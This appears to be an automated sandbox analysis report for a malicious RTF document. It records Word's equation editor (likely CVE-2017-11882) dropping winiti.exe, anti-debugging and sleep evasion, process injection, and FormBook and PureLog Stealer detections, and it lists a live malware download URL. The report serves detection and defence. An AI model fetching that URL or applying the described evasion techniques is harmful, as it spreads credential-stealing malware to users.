Source: 5.2.winiti.exe.5150000.4.raw.unpack, iIG0lTjpxEHhOQvkFer.cs High entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, g3uWXYxFNrFgfAVMbg.cs High entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, SM8r4X8fVbB7QJOWqS.cs High entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, raIl7X21rhHoQ1rmtr.cs High entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, lcS7RE1vxlKWGpOeGp.cs High entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, xFiqCjOS4mObwnqG7R.cs High entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, Y56XpTEtPmCWtAUcx3.cs High entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, LQj0kcVZN6Kkvud9DR.cs High entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, bwrRjVyKj1VL5wCXv7.cs High entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, H5DbcuXYjlGQPm0xJ0.cs High entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, IcQdK2rXYfyvqYcyHa.cs High entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, QoOP4PjGKS5gfhE57SM.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, qKgcIJaPN5xDIttQpD.cs High entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.cs High entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, Q8PlVd7gMYjm0S8vYt.cs High entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, OOABLIblxanx4dA8KG.cs High entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, f3eVc2kPtPvNgZNKDL.cs High entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, XC3FVVqBJrFXgahDpX.cs High entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\winiti.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 2510000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 3E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 7EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 5420000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 8EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: 5720000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD0101 rdtsc 6_2_00DD0101
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\winiti.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3288 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\winiti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD0101 rdtsc 6_2_00DD0101
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00417A03 LdrLoadDll, 6_2_00417A03
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D700EA mov eax, dword ptr fs:[00000030h] 6_2_00D700EA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D70080 mov ecx, dword ptr fs:[00000030h] 6_2_00D70080
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D926F8 mov eax, dword ptr fs:[00000030h] 6_2_00D926F8
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\winiti.exe Memory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\winiti.exe Queries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 5.2.winiti.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.winiti.exe.253505c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.367170446.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483003 Sample: DzokrPQPdy.rtf Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus detection for URL or domain 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 13 other signatures 2->38 8 WINWORD.EXE 291 13 2->8         started        process3 process4 10 EQNEDT32.EXE 12 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 26 104.219.239.104, 49163, 80 DATAWAGONUS United States 10->26 22 C:\Users\user\AppData\Roaming\winiti.exe, PE32 10->22 dropped 24 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 10->24 dropped 40 Office equation editor establishes network connection 10->40 42 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->42 17 winiti.exe 1 7 10->17         started        file6 signatures7 process8 signatures9 28 Machine Learning detection for dropped file 17->28 30 Injects a PE file into a foreign processes 17->30 20 winiti.exe 17->20         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.219.239.104
 unknown United States
27176 DATAWAGONUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://104.219.239.104/80/winiti.exe true
  • Avira URL Cloud: malware
 unknown